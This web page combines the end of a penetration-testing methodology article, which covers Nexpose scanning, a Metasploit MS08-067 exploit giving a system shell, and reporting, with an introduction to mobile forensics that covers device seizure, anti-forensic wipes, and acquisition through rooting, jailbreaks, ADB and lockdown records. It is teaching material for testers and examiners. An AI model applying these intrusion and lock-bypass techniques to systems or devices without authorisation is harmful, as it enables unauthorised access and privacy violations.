http://www.rapid7.com/. Once you have downloaded it, you will have to register, and you'll receive a key by e-mail to activate it. I will leave out the details of this and let you experience them on your own. Nexpose has a web interface, so once you have installed and started the tool, you have to access it. 
You can access it by entering https://localhost:3780. It seems to take an extraordinary amount of time to initialize, but eventually, it will present you with a login page, as shown in the following screenshot: The credentials required for login will have been created during the installation. It is quite an involved process to set up a scan, and since we are just detailing the process and there is an excellent quick start guide available, we will just move on to the results of the scan. We will have plenty of time to explore this area as the article progresses. The result of a typical scan is shown in the following screenshot: As you can see, the target machine is in bad shape. One nice thing about Nexpose is the fact that since they also own Metasploit, they will list the vulnerabilities that have a known exploit within Metasploit. Exploitation This is the step of the security testing that gets all the press, and it is, in simple terms, the process of validating a discovered vulnerability. It is important to note that it is not a 100-percent successful process—some vulnerabilities will not have exploits and some will have exploits for a certain patch level of the OS but not others. As I like to say, it is not an exact science and in reality is an infinitesimal part of professional security testing, but it is fun, so we will briefly look at the process. We also like to say in security testing that we have to validate and verify everything a tool reports to our client, and that is what we try to do with exploitation. The point is that you are executing a piece of code on a client's machine, and this code could cause damage. The most popular free tool for exploitation is the Rapid7-owned tool Metasploit. There are entire articles written on using the tool, so we will just look at the results of running it and exploiting a machine here. As a reminder, you have to have written permission to do this on any network other than your own; if in doubt, do not attempt it. Let's look at the options: There is quite a bit of information in the options. The one we will cover is the fact that we are using the exploit for the MS08-067 vulnerability, which is a vulnerability in the server service. It is one of the better ones to use as it almost always works and you can exploit it over and over again. If you want to know more about this vulnerability, you can check it out here: http://technet.microsoft.com/en-us/security/bulletin/ms08-067. Since the options are set, we are ready to attempt the exploit, and as indicated in the following screenshot, we are successful and have gained a shell on the target machine. The process for this we will cover as we progress through the article. For now, we will stop here. Here onward, it is only your imagination that can limit you. The shell you have opened is running at system privileges; therefore, it is the same as running a Command Prompt on any Windows machine with administrator rights, so whatever you can do in that shell, you can also do in this one. You can also do a number of other things, which you will learn as we progress through the article. Furthermore, with system access, we can plant code as malware: a backdoor or really anything we want. While we might not do that as a professional tester, a malicious hacker could do it, and this would require additional analysis to discover on the client's end. Data analysis Data analysis is often overlooked, and it can be a time-consuming process. This is the process that takes the most time to develop. 
Data analysis

Data analysis is often overlooked, and it can be a time-consuming process. This is the part of testing that takes the most time to develop. Most testers can run tools and perform manual testing and exploitation, but the real challenge is taking all of the results and analyzing them. We will look at one example of this in the next screenshot. Take a moment and review the protocol analysis captured with the tool Wireshark; as an analyst, you need to know what the protocol analyzer is showing you. Do you know exactly what is happening? Do not worry, I will tell you after we have a look at the following screenshot:

You can observe that the machine with the IP address 192.168.3.10 is replying with an ICMP packet of type 3 code 13; in other words, the packet is being rejected because the communication is administratively filtered. Furthermore, this tells us that there is a router in place and that it has an access control list (ACL) blocking the packet. Moreover, it tells us that the administrator is not following best practice, which would be to silently absorb the packets rather than reply with error messages that can assist an attacker. This is just a small example of the data analysis step; there are many things you will encounter and many more that you will have to analyze to determine what is taking place in the tested environment. Remember: the smarter the administrator, the more challenging pen testing can become, which is actually a good thing for security!
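If you prefer to isolate these replies from a saved capture at the command line instead of scrolling through the Wireshark GUI, a display filter does the job; the capture filename below is illustrative.

    # Show only ICMP "destination unreachable / communication administratively filtered" replies
    tshark -r capture.pcap -Y "icmp.type == 3 && icmp.code == 13"

The same expression can be typed into Wireshark's display filter bar to highlight the packets discussed above.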
Reporting

Reporting is another area of testing that is often overlooked in training classes. This is unfortunate, since it is one of the most important things you need to master. You have to be able to present a report of your findings to the client. These findings will assist them in improving their security practices, and if they like the report, it is what they will most often share with partners and other colleagues. This is your advertisement for what separates you from others. It is a showcase that shows not only that you know how to follow a systematic process and methodology of professional testing, but also that you know how to put it into an output form that can serve as a reference going forward for the client. At the end of the day, as professional security testers, we want to help our clients improve their security posture, and that is where reporting comes in.

There are many references for reports, so the only thing we will cover here is the handling of findings. There are two components we use when it comes to findings. The first is a summary-of-findings table, so that the client can reference the findings early on in the report. The second is the detailed findings section, where we put all of the information about the findings. We rate them according to severity and include the following:

Description

This is where we provide the description of the vulnerability; specifically, what it is and what is affected.

Analysis and exposure

Here you want to show the client that you have done your research and aren't just repeating what the scanning tool told you. It is very important that you research a number of resources and write a good analysis of what the vulnerability is, along with an explanation of the exposure it poses to the client site.

Recommendations

We want to provide the client with a reference to the patches and measures to apply in order to mitigate the risk of the discovered vulnerabilities. We never tell the client not to use the service and/or protocol! We do not know what their policy is, and it might be something they have to have in order to support their business. In these situations, it is our job as consultants to recommend and help the client determine the best way to either mitigate the risk or remove it. When a patch is not available, we should provide a reference to potential workarounds until one becomes available.

References

If there are references, such as a Microsoft bulletin number or a Common Vulnerabilities and Exposures (CVE) number, this is where we would place them.

Myths and misconceptions about pen testing

After more than 20 years of performing professional security testing, it still amazes me how many people are confused about what a penetration test is. I have on many occasions gone to a meeting where the client is convinced they want a penetration test, and when I explain exactly what it is, they look at me in shock. So, what exactly is a penetration test? Remember that our abstract methodology had a step for intrusive target searching, and that part of that step was another methodology for scanning? Well, the last item in the scanning methodology, exploitation, is the step that is indicative of a penetration test. That's right: that one step is the validation of vulnerabilities, and this is what defines penetration testing.

Again, it is not what most clients think of when they bring a team in. The majority of them in reality want a vulnerability assessment. When you start explaining to them that you are going to run exploit code and all these really cool things on their systems and/or networks, they are usually quite surprised. Most of the time, the client will want you to stop short of the validation step. On some occasions, they will ask you to prove what you have found, and then you might get to perform validation. I was once in a meeting with the IT department of a foreign country's stock market, and when I explained what we were about to do to validate vulnerabilities, the IT director's reaction was, "Those are my stock broker records, and if we lose them, we lose a lot of money!" Hence, we did not perform the validation step in that test.

Summary

In this article, we defined security testing as it relates to this article, and we identified an abstract methodology that consists of the following steps: planning, nonintrusive target search, intrusive target search, data analysis, and reporting. More importantly, we expanded the abstract model when it came to intrusive target searching, and we defined within it a methodology for scanning. This consisted of identifying live systems, looking at open ports, discovering services, enumeration, identifying vulnerabilities, and finally, exploitation.

Furthermore, we discussed what a penetration test is: a validation of vulnerabilities, associated with one step in our scanning methodology. Unfortunately, most clients do not understand that validating vulnerabilities requires you to run code that could potentially damage a machine or, even worse, damage their data. Because of this, once they discover it, most clients ask that it not be part of the test. We created a baseline for what penetration testing is in this article, and we will use this definition throughout the remainder of this article. In the next article, we will discuss the process of choosing your virtual environment.

Resources for Article:

Further resources on this subject:
• CISSP: Vulnerability and Penetration Testing for Access Control [article]
• Web app penetration testing in Kali [article]
• BackTrack 4: Security with Penetration Testing Methodology [article]

Introducing Mobile Forensics

Packt
07 Sep 2016
21 min read
In this article by Oleg Afonin and Vladimir Katalov, the authors of the book Mobile Forensics – Advanced Investigative Strategies, we will see that today's smartphones are used less for calling and more for socializing; this has resulted in smartphones holding a lot of sensitive data about their users. Mobile devices keep the user's contacts from a variety of sources (including the phone, social networks, instant messaging, and communication applications), information about phone calls, sent and received text messages, and e-mails and attachments. There are also browser logs and cached geolocation information; pictures and videos taken with the phone's camera; passwords to cloud services, forums, social networks, online portals, and shopping websites; stored payment data; and a lot of other information that can be vital for an investigation.

(For more resources related to this topic, see here.)

Needless to say, this information is very important for corporate and forensic investigations. In this book, we'll discuss not only how to gain access to all this data, but also what type of data may be available in each particular case.

Tablets are no longer used solely as entertainment devices. Equipped with powerful processors and plenty of storage, even the smallest tablets are capable of running full Windows, complete with the Office suite. While not as popular as smartphones, tablets are still widely used to socialize, communicate, plan events, and book trips. Some smartphones are equipped with screens as large as 6.4 inches, while many tablets come with the ability to make voice calls over the cellular network. All this makes it difficult to draw a line between a phone (or phablet) and a tablet.

Every smartphone on the market has a camera that, unlike a bigger (and possibly better) dedicated camera, is always accessible. As a result, an average smartphone contains more photos and videos than a dedicated camera; sometimes, it's gigabytes worth of images and video clips.

Smartphones are also storage devices. They can be used (and are used) to keep, carry, and exchange information. Smartphones connected to a corporate network may have access to files and documents not meant to be exposed. Uncontrolled access to corporate networks from employees' smartphones can (and does) cause leaks of highly sensitive information. Employees come and go. With many companies allowing or even encouraging bring-your-own-device policies, controlling the data that is accessible to those connecting to a corporate network is essential.

What You Get Depends on What You Have

Unlike personal computers, which basically present a single source of information (the device itself, consisting of hard drives and volatile memory), mobile forensics deals with multiple data sources. Depending on the sources that are available, investigators may use one tool or another to acquire information.

The mobile device

If you have access to the mobile device, you can attempt to perform physical or logical acquisition. Depending on the device itself (hardware) and the operating system it is running, this may or may not be possible. However, physical acquisition still counts as the most complete and up-to-date source of evidence among all those available.
Generally speaking, physical acquisition is available for most Android smartphones and tablets, older Apple hardware (iPhones up to the iPhone 4, the original iPad, iPad mini, and so on), and recent Apple hardware with a known passcode. As a rule, Apple devices can only be physically acquired if jailbroken. Since a jailbreak obtains superuser privileges by exploiting a vulnerability in iOS, and Apple actively fixes such vulnerabilities, physical acquisition of iOS devices remains hit and miss. A physical acquisition technique has recently been developed for some Windows phone devices using the Cellebrite Universal Forensic Extraction Device (UFED). Physical acquisition is also available for 64-bit Apple hardware (iPhone 5S and newer, iPad mini 2, and so on). It is worth noting that physical acquisition of 64-bit devices is even more restrictive compared to the older 32-bit hardware, as it requires not only jailbreaking the device and unlocking it with a passcode, but also removing the said passcode from the security settings. Interestingly, according to Apple, even Apple itself cannot extract information from 64-bit iOS devices running iOS 8 and newer, even if served a court order.

Physical acquisition is available on a limited number of BlackBerry smartphones running BlackBerry OS 7 and earlier: unlocked BlackBerry 7 and lower devices can be acquired, where supported, with Cellebrite UFED Touch/4PC through the bootloader method. For BlackBerry 10 devices where device encryption is not enabled, a chip-off can successfully acquire the device memory, with the physical dump parsed using Cellebrite UFED.

Personal computer

Notably, the user's personal computer can help in acquiring mobile evidence. The PC may contain the phone's offline data backups (such as those produced by Apple iTunes), which hold most of the information stored in the phone, whether or not it is available during physical acquisition. Lockdown records are created when an iOS device is physically connected to the computer and authorized through iTunes; they may be used to gain access to an iOS device without entering the passcode. In addition, the computer may contain binary authentication tokens that can be used to access the respective cloud accounts linked to the user's mobile devices.
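These artifacts live in well-known locations, so a quick triage of a suspect's computer can be as simple as listing a couple of directories. The commands below are a sketch for a macOS workstation; on a Windows machine, the equivalent locations are %APPDATA%\Apple Computer\MobileSync\Backup for iTunes backups and %ProgramData%\Apple\Lockdown for lockdown records.

    # iTunes backups created for iOS devices synced with this Mac
    ls -la ~/Library/Application\ Support/MobileSync/Backup/

    # Lockdown (pairing) records created when devices were authorized through iTunes
    sudo ls -la /var/db/lockdown/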
Access to cloud storage

Many smartphones and tablets, especially those produced by Apple, offer the ability to back up information into an online cloud. Apple smartphones, for example, will automatically back up their content to Apple iCloud every time they are connected to a charger within the reach of a known Wi-Fi network. Windows phone devices exhibit similar behavior. Google, while not featuring full cloud backups like Apple or Microsoft, collects and retains even more information through Google Mobile Services (GMS). This information can also be pulled from the cloud. Since cloud backups are transparent, non-intrusive, and require no user interaction, many smartphone users leave them enabled by default, which makes it possible for an investigator to either acquire the content of the cloud storage or request it from the respective company with a court order. In order to successfully access the phone's cloud storage, one needs to know the user's authentication credentials (login and password). It may also be possible to access iCloud by using binary authentication tokens extracted from the user's computer. With manufacturers quickly advancing in their security implementations, cloud forensics is quickly gaining importance and recognition among digital forensic specialists.

Stages of mobile forensics

This section will briefly discuss the general stages of mobile forensics; it is not intended to provide a detailed explanation of each stage, as there is more than sufficient documentation readily available on the Internet that covers the stages of mobile forensics in intimate detail. The most important concept for the reader to understand is this: have the least level of impact on the mobile device during all of the stages. In other words, an examiner should work along the continuum from the least-intrusive method to the most-intrusive method, a choice dictated by the type of data that needs to be obtained from the mobile device and the complexity of its hardware and software.

Stage one – device seizure

This stage pertains to the physical seizure of the device so that it comes under the control and custody of the investigator/examiner. Consideration must also be given to the legal authority or written consent to seize, extract, and search this data. The physical condition of the device at the time of seizure should be noted, ideally through digital photographic documentation and written notes, such as:

• Is the device damaged? If yes, document the type of damage.
• Is the device on or off?
• What is the device date and time if the device is on?
• If the device is on, what apps are running or observable on the device desktop?
• If the device is on, is the device desktop accessible so you can check for passcode and security settings?

Several other aspects of device seizure are described in the following sections, as they will affect post-seizure analysis: radio isolation, turning the device off if it is on, remote wipe, and anti-forensics.

Seizing – what and how to seize?

When it comes to properly acquiring a mobile device, one must be aware of the many differences in how computers and mobile devices operate. Seizing, handling, storing, and extracting mobile devices must follow a different route compared to desktop and even laptop computers. Unlike PCs, which can be either online or offline (including the energy-saving states of sleep and hibernation), smartphones and tablets use a different, always-connected modus operandi. Tremendous amounts of activity are carried out in the background, even while the device is apparently sleeping. Activities can be scheduled or triggered by a large number of events, including push events from online services and events initiated remotely by the user.

Another thing to consider when acquiring a mobile device is security. Mobile devices are carried around a lot, and they are designed to be inherently more secure than desktop PCs. Non-removable storage and soldered RAM chips, optional or enforced data encryption, remote kill switches, secure lock screens, and locked bootloaders are just a few of the security measures worth mentioning.

The use of Faraday bags

Faraday bags are commonly used to temporarily store seized devices without powering them down. A Faraday bag blocks wireless connectivity to cellular networks, Wi-Fi, Bluetooth, satellite navigation, and any other radios used in mobile devices. Faraday bags are normally designed to shield the range of radio frequencies used by local cellular carriers and satellite navigation (typically 700-2,600 MHz), as well as the 2.4-5 GHz range used by Wi-Fi networks and Bluetooth. Many Faraday bags are made of specially coated metallic shielding material that blocks a wide range of radio frequencies.
Keeping the power on

When dealing with a seized device, it is essential to prevent the device from powering off. Never switching off a working device is one thing; preventing it from powering down is another. Since mobile devices consume power even while the display is off, the standard practice is to connect the device to a charger and place it into a wireless-blocking Faraday bag. This will prevent the mobile device from shutting down after reaching the low-power state.

Why exactly do we need this procedure? The thing is, you may be able to extract more information from a device that was used (unlocked at least once) after the last boot cycle compared to a device that boots up in your lab when you don't know the passcode. To illustrate the potential outcome, let's say you seized an iPhone that is locked with an unknown passcode. The iPhone happens to be jailbroken, so you can attempt to use Elcomsoft iOS Forensic Toolkit to extract information. If the device is locked and you don't know the passcode, you will have access to a very limited set of data:

• Recent geolocation information: Since the main location database remains encrypted, it is only possible to extract limited location data. This limited location data is only accessible if the device was unlocked at least once after the boot has completed. As a result, if you keep the device powered on, you may pull recent geolocation history from this device. If, however, the device shuts down and is only powered on in the lab, the geolocation data will remain inaccessible until the device is unlocked.
• Incoming calls (numbers only) and text messages: Incoming text messages are temporarily retained unencrypted before the first unlock after cold boot. Once the device is unlocked for the first time after cold boot, the messages are transferred into the main encrypted database. This means that acquiring a device that was never unlocked after a cold start will only allow access to text messages received by the device during the time it remained locked after the boot. If the iPhone being acquired was unlocked at least once after it was booted (for example, if the device was seized in a turned-on state), you may be able to access significantly more information. The SMS database is decrypted on first unlock, allowing you to pull all text messages and not just those that were received while the device remained locked.
• App and system logs (installs and updates, net access logs, and so on).
• SQLite temp files, including write-ahead logs (WAL): These WAL files may include messages received by applications such as Skype, Viber, Facebook Messenger, and so on. Once the device is unlocked, the data is merged with the corresponding apps' main databases. When extracting a device after a cold boot (never unlocked), you will only have access to notifications received after the boot. If, however, you are extracting a device that was unlocked at least once after booting up, you may be able to extract the complete database with all messages (depending on the data protection class selected by the developer of a particular application).

Dealing with the kill switch

Mobile operating systems such as Apple iOS, recent versions of Google Android, all versions of BlackBerry OS, and Microsoft Windows phone 8/8.1 (Windows 10 mobile) have an important security feature designed to prevent unauthorized persons from accessing information stored in the device. The so-called kill switch enables the owner to lock or erase the device if it is reported lost or stolen. While used by legitimate customers to safeguard their data, this feature is also used by suspects who may attempt to remotely destroy evidence if their mobile device is seized.
In the recent report, Morristown man accused of remotely wiping nude photos of underage girlfriend on confiscated phone (http://wate.com/2015/04/07/morristown-man-accused-of-remotely-wiping-nude-photos-of-underage-girlfriend-on-confiscated-phone/), the accused used the remote kill switch to wipe data stored on his iPhone. Using a Faraday bag is essential to prevent suspects from accessing the kill switch. However, even if the device in question has already been wiped remotely, it does not necessarily mean that all the data is completely lost. Apple iOS, Windows phone 8/8.1, Windows 10 mobile, and the latest version of Android (Android 6.0 Marshmallow) support cloud backups (although Android cloud backups contain limited amounts of data). When it comes to BlackBerry 10, the backups are strictly offline, yet the decryption key is tied to the user's BlackBerry ID and stored on BlackBerry servers. The ability to automatically upload backup copies of data into the cloud is a double-edged sword. While offering more convenience to the user, cloud backups make remote acquisition techniques possible. Depending on the platform, all or some of the information from the device can be retrieved from the cloud, either by making use of a forensic tool (for example, Elcomsoft Phone Breaker or Oxygen Forensic Detective) or by serving a government request to the corresponding company (Apple, Google, Microsoft, or BlackBerry).

Mobile device anti-forensics

There are numerous anti-forensic methods that target the evidence acquisition methods used by law enforcement. It is common for the police to seize a device, connect it to a charger, and place it into a Faraday bag. One anti-forensic method used by some technologically advanced suspects on Android phones involves rooting the device and installing a tool that monitors the wireless connectivity of the device. If the tool detects that the device has been idle, connected to a charger, and without wireless connectivity for a predefined period, it performs a factory reset. Since there is no practical way of determining whether such protection is active on the device prior to acquisition, simply following established guidelines presents a risk of evidence being destroyed. If there are reasonable grounds to suspect such a system may be in place, the device can be powered down (while accepting the risk of full-disk encryption preventing subsequent acquisition).

While rooting or jailbreaking a device generally makes it susceptible to advanced acquisition methods, we've seen users who unlocked their bootloader to install a custom recovery, protected access to this custom recovery with a password, and then relocked the bootloader. A locked bootloader combined with password-protected access to a custom recovery is an extremely tough combination to break.

In several reports, we've become aware of the following anti-forensic technique used by a group of cyber criminals. The devices were configured to automatically wipe user data if certain predefined conditions were met. In this case, the predefined conditions triggering the wipe matched the typical acquisition scenario of placing the device inside a Faraday bag and connecting it to a charger. Once the device reported being charged without wireless connectivity (but not in airplane mode) for a certain amount of time, a special tool triggered a full factory reset of the device. Notably, this is only possible on rooted/jailbroken devices.
So far, this anti-forensic technique has not received wide recognition. It is used by a small minority of smartphone users, mostly those involved in cybercrime, and the probability of encountering a smartphone configured this way is low enough that it has not prompted changes to published guidelines.

Stage two – data acquisition

This stage refers to the various methods of extracting data from the device. The methods of data extraction that can be employed are influenced by the following:

• Type of mobile device: The make, model, hardware, software, and vendor configuration.
• Availability of a diverse set of hardware and software extraction/analysis tools at the examiner's disposal: There is no tool that does it all; an examiner needs to have access to a number of tools that can assist with data extraction.
• Physical state of the device: Has the device been exposed to damage, such as physical damage, water, or biological fluids such as blood? Often the type of damage will dictate the data extraction measures that can be employed on the device.

There are several different types of data extraction, which determine how much data is obtained from the device:

• Physical: A binary image of the device has the most potential to recover deleted data and obtains the largest amount of data from the device. This can be the most challenging type of extraction to obtain.
• File system: This is a representation of the files and folders from the user area of the device, and it can contain deleted data, specifically within databases. This method will contain less data than a physical extraction.
• Logical: This acquires the least amount of data from the device. Examples of this are call history, messages, contacts, pictures, movies, audio files, and so on. This is referred to as low-hanging fruit. No deleted data or source files are obtained. Often the resulting output will be a series of reports produced by the extraction tool. This is often the easiest and quickest type of extraction (a brief sketch of one such extraction follows this list).
• Photographic documentation: This method is typically used when all other data extraction avenues have been exhausted. In this procedure, the examiner uses a digital camera to photographically document the content being displayed by the device. This is a time-consuming method when there is an extensive amount of information to photograph.

Specific data-extraction concepts explained here are bootloader, jailbreak, rooting, ADB, debug, and SIM cloning.
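As a small illustration of a logical extraction, the sketch below shows how an examiner might pull an ADB backup from an Android handset. It assumes USB debugging is enabled and the workstation has been authorized on the device (ADB debugging is discussed in the next section); the output filename is illustrative, and adb backup is limited or unavailable on recent Android versions.

    # Confirm the handset is visible and authorized over ADB
    adb devices -l

    # Record basic device information for the case notes
    adb shell getprop ro.product.model
    adb shell getprop ro.build.version.release

    # Create a logical backup (app data, APKs, and shared storage) on older Android releases
    adb backup -apk -shared -all -f evidence_backup.ab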
Root, jailbreak, and unlocked bootloader

Rooting or jailbreaking mobile devices in general makes them susceptible to a wide range of exploits. In the context of mobile forensics, rooted devices are easy to acquire, since many forensic acquisition tools rely on root/jailbreak to perform physical acquisition. Devices with unlocked bootloaders allow booting unsigned code, effectively permitting full access to the device even if it is locked with a passcode. However, if the device is encrypted and the passcode is part of the encryption key, bypassing passcode protection may not automatically enable access to encrypted data.

Rooting or jailbreaking enables unrestricted access to the filesystem, bypassing the operating system's security measures and allowing the acquisition tool to read information from protected areas. This is one of the reasons for banning rooted devices (as well as devices with unlocked bootloaders) from corporate premises. Installing a jailbreak on iOS devices always makes the phone less secure, enabling third-party code to be injected and run at a system level. This fact is well known to forensic experts, who make use of tools such as Cellebrite UFED or Elcomsoft iOS Forensic Toolkit to perform physical acquisition of jailbroken Apple smartphones.

Some Android devices allow unlocking the bootloader, which enables easy and straightforward rooting of the device. While not all Android devices with unlocked bootloaders are rooted, installing root access during acquisition of a bootloader-unlocked device has a much higher chance of success compared to devices that are locked down. Tools such as Cellebrite UFED, Forensic Toolkit (FTK), Oxygen Forensic Suite, and many others can make use of the phone's root status in order to inject acquisition applets and image the device. Unlocked bootloaders can be exploited as well if you use UFED. A bootloader-level exploit exists and is used in UFED to perform acquisition of many Android and Windows phone devices based on the Qualcomm reference platform, even if their bootloader is locked.

Android ADB debugging

Android has a hidden Developer Options menu. Accessing this menu requires a conscious effort of tapping on the OS build number multiple times. Some users enable Developer Options out of curiosity. Once enabled, the Developer Options menu may or may not be possible to hide. Among other things, the Developer Options menu lists an option called USB debugging or ADB debugging. If enabled, this option allows controlling the device via the ADB command line, which in turn allows experts using Android debugging tools (adb.exe) to connect to the device from a PC even if it is locked with a passcode. Activated USB debugging exposes a lot of possibilities and can make acquisition possible even if the device is locked with a passcode.

Memory card

Most smartphones and tablets (except iOS devices) have the capability of increasing their storage capacity by using a microSD card. An examiner would remove the memory card from the mobile device or tablet, use either hardware or software write-protection methods, and create a bit-stream forensic image of the memory card, which can then be analyzed using forensic software tools such as X-Ways, Autopsy Sleuth Kit, Forensic Explorer (GetData), EnCase, or FTK (AccessData).
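As an illustration, on a Linux forensic workstation with the card attached through a hardware write blocker, the imaging step might look like the sketch below; the device node /dev/sdb and the filenames are illustrative and must be verified against your own setup before anything is imaged.

    # Identify the device node assigned to the write-blocked card reader
    lsblk

    # Create a bit-stream image of the memory card
    dd if=/dev/sdb of=sdcard.dd bs=4M conv=noerror,sync status=progress

    # Hash the source card and the image to document integrity
    sha256sum /dev/sdb sdcard.dd

Note that conv=noerror,sync pads unreadable blocks so the image keeps its offsets, which is why the hashes may differ if the card has bad sectors; in that case, document the read errors in your notes.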
Stage three – data analysis

This stage of mobile device forensics entails analysis of the data acquired from the device and its components (SIM card and memory card, if present). Most mobile forensic acquisition tools that acquire the data from the device memory can also parse the extracted data and provide the examiner with functionality within the tool to perform analysis. This entails review of any non-deleted and deleted data.

When reviewing non-deleted data, it is prudent to also perform a manual review of the device to ensure that the extracted and parsed data matches what is displayed by the device. As mobile device storage capacities have increased, it is suggested that a limited subset of data records from the relevant areas be reviewed. So, for example, if a mobile device has over 200 call records, several records from the missed, incoming, and outgoing call categories can be checked on the device against the corresponding records in the extracted data. By doing this manual review, it is possible to discover any discrepancies in the extracted data. Manual device review can only be completed while the device is still in the custody of the examiner. There are situations where, after the data extraction has been completed, the device is released back to the investigator or owner. In situations such as this, the examiner should document that very limited or no manual verification could be performed due to these circumstances. Finally, the reader should be keenly aware that more than one analysis tool can be used to analyze the acquired data. Multiple analysis tools should be considered, especially when a specific type of data cannot be parsed by one tool but can be analyzed by another.

Summary

In this article, we've covered the basics of mobile forensics. We discussed the amount of evidence available in today's mobile devices and covered the general steps of mobile forensics. We also discussed how to seize, handle, and store mobile devices, and looked at how criminals can use technology to prevent forensic access. We provided a general overview of the acquisition and analysis steps.

For more information on mobile forensics, you can refer to the following books by Packt:

• Practical Mobile Forensics - Second Edition: https://www.packtpub.com/networking-and-servers/practical-mobile-forensics-second-edition
• Mastering Mobile Forensics: https://www.packtpub.com/networking-and-servers/mastering-mobile-forensics
• Learning iOS Forensics: https://www.packtpub.com/networking-and-servers/learning-ios-forensics

Resources for Article:

Further resources on this subject:
• Mobile Forensics [article]
• Mobile Forensics and Its Challanges [article]
• Introduction to Mobile Forensics [article]